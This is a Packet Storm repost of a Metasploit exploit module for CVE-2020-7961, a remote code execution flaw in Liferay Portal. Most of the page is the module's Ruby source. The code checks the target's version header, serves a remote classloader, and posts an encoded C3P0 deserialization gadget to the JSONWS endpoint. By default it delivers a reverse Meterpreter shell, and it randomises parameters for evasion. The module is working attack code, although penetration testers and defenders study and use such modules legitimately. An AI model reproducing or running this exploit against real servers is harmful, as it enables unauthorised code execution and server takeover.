exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Liferay Portal Java Unmarshalling Remote Code Execution

Liferay Portal Java Unmarshalling Remote Code Execution
Posted Apr 15, 2020
Authored by Markus Wulftange, wvu, Thomas Etrillard | Site metasploit.com

This Metasploit module exploits a Java unmarshalling vulnerability via JSONWS in Liferay Portal versions prior to 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.

tags | exploit, java
advisories | CVE-2020-7961
SHA-256 | 0a05b28933eea9b4fd536dc8f5ff0aa3f15ae34ce0529c5fa21139b75f041521

Liferay Portal Java Unmarshalling Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Java::HTTP::ClassLoader
include Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(update_info(info,
'Name' => 'Liferay Portal Java Unmarshalling via JSONWS RCE',
'Description' => %q{
This module exploits a Java unmarshalling vulnerability via JSONWS in
Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2
to execute code as the Liferay user. Tested against 7.2.0 GA1.
},
'Author' => [
'Markus Wulftange', # Discovery
'Thomas Etrillard', # PoC
'wvu' # Module
],
'References' => [
['CVE', '2020-7961'],
['URL', 'https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html'],
['URL', 'https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html'],
['URL', 'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271']
],
'DisclosureDate' => '2019-11-25', # Vendor advisory
'License' => MSF_LICENSE,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Privileged' => false,
'Targets' => [
['Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_tcp'},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))

register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def check
# GET / response contains a Liferay-Portal header with version information
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)

unless res
return CheckCode::Unknown('Target did not respond to check request.')
end

unless res.headers['Liferay-Portal']
return CheckCode::Unknown(
'Target did not respond with Liferay-Portal header.'
)
end

=begin
Building the Liferay-Portal header:
https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
Liferay-Portal header data:
https://github.com/liferay/liferay-portal/blob/master/release.properties

Example GET / response:
HTTP/1.1 200
[snip]
Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)
[snip]
=end
version, build = res.headers['Liferay-Portal'].scan(
/^Liferay.*Portal ([\d.]+.*GA\d+).*Build (\d+)/
).flatten

unless version && (build = Integer(build) rescue nil)
return CheckCode::Detected(
'Target did not respond with Liferay version and build.'
)
end

# XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched
if build < 7201
return CheckCode::Appears(
"Liferay #{version} MAY be a vulnerable version. Please verify."
)
end

CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.")
end

def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super

# Start our HTTP server to provide remote classloading
@classloader_uri = start_service

unless @classloader_uri
fail_with(Failure::BadConfig, 'Could not start remote classloader server')
end

print_good("Started remote classloader server at #{@classloader_uri}")

# Send our remote classloader gadget to the target, triggering the vuln
send_request_gadget(
normalize_uri(target_uri.path, '/api/jsonws/expandocolumn/update-column'),
# Required POST parameters for /api/jsonws/expandocolumn/update-column:
# https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
'columnId' => rand(8..42), # Randomize for "evasion"
'name' => rand(8..42), # Randomize for "evasion"
'type' => rand(8..42) # Randomize for "evasion"
)
end

# Convenience method to send our gadget to a URI with desired POST params
def send_request_gadget(uri, vars_post = {})
print_status("Sending remote classloader gadget to #{full_uri(uri)}")

vars_post['+defaultData'] =
'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource'

vars_post['defaultData.userOverridesAsString'] =
"HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};"

send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => vars_post
}, 0)
end

# Generate all marshalsec payloads for the Jackson marshaller:
# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
def go_go_gadget
# Implementation of the Jackson marshaller's C3P0WrapperConnPool gadget:
# https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
gadget = Rex::Text.decode_base64(
<<~EOF
rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl
cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p
bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly
ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p
bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA
DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0
aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv
AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0
ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7
kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQABEhBQ0t0AANUSEV0AAZQTEFORVQ=
EOF
)

# Replace length-prefixed placeholder strings with our own
gadget.sub!("\x00\x04HACK", packed_class_name)
gadget.sub!("\x00\x03THE", packed_classloader_uri)
gadget.sub("\x00\x06PLANET", packed_class_name)
end

# Convenience method to pack the classloader URI as a length-prefixed string
def packed_classloader_uri
"#{[@classloader_uri.length].pack('n')}#{@classloader_uri}"
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close